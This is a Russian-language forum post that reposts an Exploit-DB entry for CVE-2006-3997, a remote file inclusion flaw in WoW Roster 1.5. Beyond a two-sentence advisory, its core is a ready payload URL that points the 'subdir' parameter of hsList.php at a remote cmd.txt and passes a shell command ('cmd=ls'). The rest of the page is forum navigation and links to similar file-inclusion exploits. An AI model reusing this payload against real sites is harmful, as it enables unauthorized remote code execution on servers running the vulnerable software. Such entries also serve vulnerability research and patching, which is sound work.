Exploit WoW Roster 1.5 - 'hsList.php?subdir' Remote File Inclusion

Автор темы Exploiter
Дата начала 21 Дек 2022
Просмотров 343 Просмотров

JavaScript отключён. Чтобы полноценно использовать наш сайт, включите JavaScript в своём браузере.

Exploiter

Хакер

21 Дек 2022

EDB-ID: 28317

Проверка EDB

Пройдено

Автор: SKULMATIC

Тип уязвимости: WEBAPPS

Платформа: PHP

CVE: cve-2006-3997

Дата публикации: 2006-08-01

Код:

source: https://www.securityfocus.com/bid/19269/info

WoW Roster is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.

A successful exploit may allow unauthorized users to execute remote PHP scripts; other attacks are also possible.

http://www.example.com/[wow_roster_path]/hsList.php?subdir=http://www.example.com/cmd.txt?&cmd=ls

Источник: www.exploit-db.com

Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploit Shadowed Portal Module Character Roster - 'mod_root' Remote File Inclusion

Ответы: 0

Просмотры: 272

Эксплойты & Уязвимости 21 Дек 2022

Exploiter

Exploit WoW Roster 1.70 - '/lib/phpBB.php' Remote File Inclusion

Ответы: 0

Просмотры: 277

Эксплойты & Уязвимости 21 Дек 2022

Exploiter

Exploit WoW Roster 1.5.1 - 'subdir' Remote File Inclusion

Ответы: 0

Просмотры: 257

Эксплойты & Уязвимости 21 Дек 2022

Exploiter

Сверху Снизу

Привет, Друг. Твои права на форуме ограничены! Зарегистрируйся или Войди на форум, чтобы снять ограничение.